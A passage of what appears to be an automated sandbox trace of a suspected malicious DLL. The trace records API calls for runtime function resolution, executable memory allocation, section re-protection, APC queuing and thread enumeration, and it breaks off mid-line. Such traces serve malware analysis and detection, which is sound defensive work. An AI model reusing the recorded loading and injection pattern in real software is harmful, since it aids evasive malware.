¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x40f1a8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0040.659] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x40fb70, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x04Ô¢>¬ý@", lpUsedDefaultChar=0x0) returned 256 [0040.659] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x40fc70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0040.659] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x40fc70, cbMultiByte=256, lpWideCharStr=0x40f3c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0040.659] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0040.659] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x40f1b8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0040.659] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x40fa70, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x04Ô¢>¬ý@", lpUsedDefaultChar=0x0) returned 256 [0040.659] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x80) returned 0x765110 [0040.659] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x128de10, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\hpDLipgxS.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\hpdlipgxs.exe")) returned 0x28 [0040.659] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x126) returned 0x766bb8 [0040.659] RtlInitializeSListHead (in: ListHead=0x128dd40 | out: ListHead=0x128dd40) [0040.659] GetLastError () returned 0x0 [0040.659] SetLastError (dwErrCode=0x0) [0040.659] GetEnvironmentStringsW () returned 0x766ce8* [0040.659] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xb80) returned 0x767870 [0040.660] FreeEnvironmentStringsW (penv=0x766ce8) returned 1 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x98) returned 0x766ce8 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x3e) returned 0x766d88 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x56) returned 0x766dd0 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x6e) returned 0x766e30 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x78) returned 0x7613e0 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x62) returned 0x766ea8 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x30) returned 0x766f18 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x48) returned 0x766f50 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x28) returned 0x765198 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x1a) returned 0x766b78 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x34) returned 0x766fa0 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x5c) returned 0x766fe0 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x32) returned 0x767048 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x2e) returned 0x767088 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x1c) returned 0x768410 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x19c) returned 0x768bf8 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x7c) returned 0x768da0 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x36) returned 0x768e28 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x3a) returned 0x768e68 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x90) returned 0x768eb0 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x24) returned 0x768f48 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x30) returned 0x768f78 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x36) returned 0x7670c0 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x48) returned 0x767100 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x52) returned 0x767150 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x3c) returned 0x7671b0 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xd6) returned 0x7671f8 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x2e) returned 0x768fb0 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x1e) returned 0x768438 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x2c) returned 0x7672d8 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x54) returned 0x767310 [0040.660] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x52) returned 0x767370 [0040.661] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x2c) returned 0x7673d0 [0040.661] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x26) returned 0x767408 [0040.661] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x3e) returned 0x769000 [0040.661] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x24) returned 0x767438 [0040.661] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x30) returned 0x767468 [0040.661] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x8c) returned 0x7674a0 [0040.662] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x767870 | out: hHeap=0x750000) returned 1 [0040.662] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x800) returned 0x767538 [0040.662] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0040.662] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12721d9) returned 0x0 [0040.663] GetStartupInfoW (in: lpStartupInfo=0x40fdd8 | out: lpStartupInfo=0x40fdd8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\hpDLipgxS.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0040.663] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\hpDLipgxS.exe\" /dll=\"C:\\Users\\KEECFM~1\\Desktop\\e609894b274a6c42e971e8082af8fd167ade4aef5d1a3816d5acea04839f0b35.dll\"" [0040.663] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\kEecfMwgj\\Desktop\\hpDLipgxS.exe\" /dll=\"C:\\Users\\KEECFM~1\\Desktop\\e609894b274a6c42e971e8082af8fd167ade4aef5d1a3816d5acea04839f0b35.dll\"", pNumArgs=0x40fdc4 | out: pNumArgs=0x40fdc4) returned 0x768188*="C:\\Users\\kEecfMwgj\\Desktop\\hpDLipgxS.exe" [0040.663] LoadLibraryW (lpLibFileName="C:\\Users\\KEECFM~1\\Desktop\\e609894b274a6c42e971e8082af8fd167ade4aef5d1a3816d5acea04839f0b35.dll") returned 0x410000 [0041.097] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x40f78c, nSize=0x200 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\hpDLipgxS.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\hpdlipgxs.exe")) returned 0x28 [0041.097] GetBinaryTypeW (in: lpApplicationName="C:\\Users\\kEecfMwgj\\Desktop\\hpDLipgxS.exe", lpBinaryType=0x40f98c | out: lpBinaryType=0x40f98c) returned 1 [0041.098] LdrGetProcedureAddress (in: BaseAddress=0x75130000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x40f5d4 | out: ProcedureAddress=0x40f5d4*=0x75141836) returned 0x0 [0041.098] VirtualAlloc (lpAddress=0x0, dwSize=0x62000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b0000 [0041.130] LdrGetProcedureAddress (in: BaseAddress=0x75130000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x40f5fc | out: ProcedureAddress=0x40f5fc*=0x75141836) returned 0x0 [0041.130] VirtualAlloc (lpAddress=0x0, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x40) returned 0xf0000 [0041.132] LdrGetProcedureAddress (in: BaseAddress=0x75130000, Name="LoadLibraryA", Ordinal=0x0, ProcedureAddress=0x40f60c | out: ProcedureAddress=0x40f60c*=0x7514498f) returned 0x0 [0041.133] LdrGetProcedureAddress (in: BaseAddress=0x75130000, Name="GetProcAddress", Ordinal=0x0, ProcedureAddress=0x40f60c | out: ProcedureAddress=0x40f60c*=0x75141222) returned 0x0 [0041.133] LdrGetProcedureAddress (in: BaseAddress=0x75130000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x40f60c | out: ProcedureAddress=0x40f60c*=0x75141836) returned 0x0 [0041.133] LdrGetProcedureAddress (in: BaseAddress=0x75130000, Name="VirtualProtect", Ordinal=0x0, ProcedureAddress=0x40f60c | out: ProcedureAddress=0x40f60c*=0x75144317) returned 0x0 [0041.133] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x75130000 [0041.133] GetProcAddress (hModule=0x75130000, lpProcName="FreeConsole") returned 0x751e7070 [0041.133] GetProcAddress (hModule=0x75130000, lpProcName="VirtualQuery") returned 0x75144412 [0041.133] VirtualAlloc (lpAddress=0x0, dwSize=0xe000, flAllocationType=0x1000, flProtect=0x4) returned 0x100000 [0041.134] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77460000 [0041.134] GetProcAddress (hModule=0x77460000, lpProcName="_snwprintf") returned 0x77492417 [0041.134] GetProcAddress (hModule=0x77460000, lpProcName="memset") returned 0x7748df20 [0041.134] GetProcAddress (hModule=0x77460000, lpProcName="NtQuerySystemInformation") returned 0x7747fda0 [0041.135] GetProcAddress (hModule=0x77460000, lpProcName="_aulldiv") returned 0x774bb140 [0041.135] GetProcAddress (hModule=0x77460000, lpProcName="RtlUnwind") returned 0x774a6d39 [0041.135] GetProcAddress (hModule=0x77460000, lpProcName="NtQueryVirtualMemory") returned 0x7747fbc8 [0041.135] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x75130000 [0041.135] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadAffinityMask") returned 0x75160570 [0041.135] GetProcAddress (hModule=0x75130000, lpProcName="CloseHandle") returned 0x751413f0 [0041.135] GetProcAddress (hModule=0x75130000, lpProcName="GetLocaleInfoA") returned 0x7515d5b5 [0041.135] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemDefaultUILanguage") returned 0x75162af2 [0041.135] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadPriority") returned 0x7514326b [0041.135] GetProcAddress (hModule=0x75130000, lpProcName="HeapFree") returned 0x751414a9 [0041.136] GetProcAddress (hModule=0x75130000, lpProcName="Sleep") returned 0x751410ff [0041.136] GetProcAddress (hModule=0x75130000, lpProcName="ExitThread") returned 0x774bd598 [0041.136] GetProcAddress (hModule=0x75130000, lpProcName="lstrlenW") returned 0x751416e0 [0041.136] GetProcAddress (hModule=0x75130000, lpProcName="GetLastError") returned 0x751411c0 [0041.136] GetProcAddress (hModule=0x75130000, lpProcName="VerLanguageNameA") returned 0x751c4b2f [0041.136] GetProcAddress (hModule=0x75130000, lpProcName="GetExitCodeThread") returned 0x7515d585 [0041.136] GetProcAddress (hModule=0x75130000, lpProcName="HeapCreate") returned 0x751449e5 [0041.136] GetProcAddress (hModule=0x75130000, lpProcName="HeapDestroy") returned 0x75143567 [0041.136] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentThread") returned 0x751417cc [0041.136] GetProcAddress (hModule=0x75130000, lpProcName="SleepEx") returned 0x75141215 [0041.136] GetProcAddress (hModule=0x75130000, lpProcName="WaitForSingleObject") returned 0x75141136 [0041.137] GetProcAddress (hModule=0x75130000, lpProcName="InterlockedDecrement") returned 0x751413d0 [0041.137] GetProcAddress (hModule=0x75130000, lpProcName="InterlockedIncrement") returned 0x751413e0 [0041.137] GetProcAddress (hModule=0x75130000, lpProcName="HeapAlloc") returned 0x7748e026 [0041.137] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleA") returned 0x75141245 [0041.137] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleFileNameW") returned 0x75144908 [0041.137] GetProcAddress (hModule=0x75130000, lpProcName="SetLastError") returned 0x751411a9 [0041.137] GetProcAddress (hModule=0x75130000, lpProcName="VirtualProtect") returned 0x75144317 [0041.137] GetProcAddress (hModule=0x75130000, lpProcName="OpenProcess") returned 0x75141966 [0041.137] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventA") returned 0x7514323c [0041.137] GetProcAddress (hModule=0x75130000, lpProcName="GetLongPathNameW") returned 0x7514a2cd [0041.137] GetProcAddress (hModule=0x75130000, lpProcName="GetVersion") returned 0x7514441f [0041.137] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcessId") returned 0x751411f8 [0041.138] GetProcAddress (hModule=0x75130000, lpProcName="TerminateThread") returned 0x751479e7 [0041.138] GetProcAddress (hModule=0x75130000, lpProcName="QueueUserAPC") returned 0x75169f2d [0041.138] GetProcAddress (hModule=0x75130000, lpProcName="CreateThread") returned 0x75143485 [0041.138] GetProcAddress (hModule=0x75130000, lpProcName="GetProcAddress") returned 0x75141222 [0041.138] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryA") returned 0x7514498f [0041.138] GetProcAddress (hModule=0x75130000, lpProcName="MapViewOfFile") returned 0x751418d1 [0041.138] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemTimeAsFileTime") returned 0x751434b9 [0041.138] GetProcAddress (hModule=0x75130000, lpProcName="CreateFileMappingW") returned 0x751418e9 [0041.138] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x75910000 [0041.138] GetProcAddress (hModule=0x75910000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorA") returned 0x7591ca94 [0041.138] FreeConsole () returned 0 [0041.138] VirtualProtect (in: lpAddress=0x410000, dwSize=0x96000, flNewProtect=0x4, lpflOldProtect=0x40f688 | out: lpflOldProtect=0x40f688*=0x2) returned 1 [0041.158] VirtualProtect (in: lpAddress=0x410000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x40f688 | out: lpflOldProtect=0x40f688*=0x4) returned 1 [0041.158] VirtualProtect (in: lpAddress=0x411000, dwSize=0x1787, flNewProtect=0x20, lpflOldProtect=0x40f688 | out: lpflOldProtect=0x40f688*=0x4) returned 1 [0041.178] VirtualProtect (in: lpAddress=0x413000, dwSize=0x5c0, flNewProtect=0x2, lpflOldProtect=0x40f688 | out: lpflOldProtect=0x40f688*=0x4) returned 1 [0041.178] VirtualProtect (in: lpAddress=0x414000, dwSize=0x25c, flNewProtect=0x4, lpflOldProtect=0x40f688 | out: lpflOldProtect=0x40f688*=0x4) returned 1 [0041.178] VirtualProtect (in: lpAddress=0x415000, dwSize=0x2dc, flNewProtect=0x4, lpflOldProtect=0x40f688 | out: lpflOldProtect=0x40f688*=0x4) returned 1 [0041.178] VirtualProtect (in: lpAddress=0x416000, dwSize=0x8000, flNewProtect=0x2, lpflOldProtect=0x40f688 | out: lpflOldProtect=0x40f688*=0x4) returned 1 [0041.178] HeapCreate (flOptions=0x0, dwInitialSize=0x400000, dwMaximumSize=0x0) returned 0xb50000 [0041.189] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x75141215, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x40fa78 | out: lpThreadId=0x40fa78*=0xee8) returned 0xb8 [0041.190] QueueUserAPC (pfnAPC=0x411108, hThread=0xb8, dwData=0x0) returned 0x1 [0041.190] GetCurrentProcessId () returned 0xed8 [0041.190] GetCurrentThreadId () returned 0xedc [0041.191] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0xb4 [0041.196] Thread32First (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.197] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.197] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.198] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.199] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.199] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.200] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.200] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.200] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.201] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.201] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.202] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.202] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.203] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.203] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.204] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.204] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.204] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.205] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.205] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.206] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.206] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.207] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.207] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.207] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.208] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.208] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 1 [0041.209] Thread32Next (hSnapshot=0xb4, lpte=0x40fda8) returned 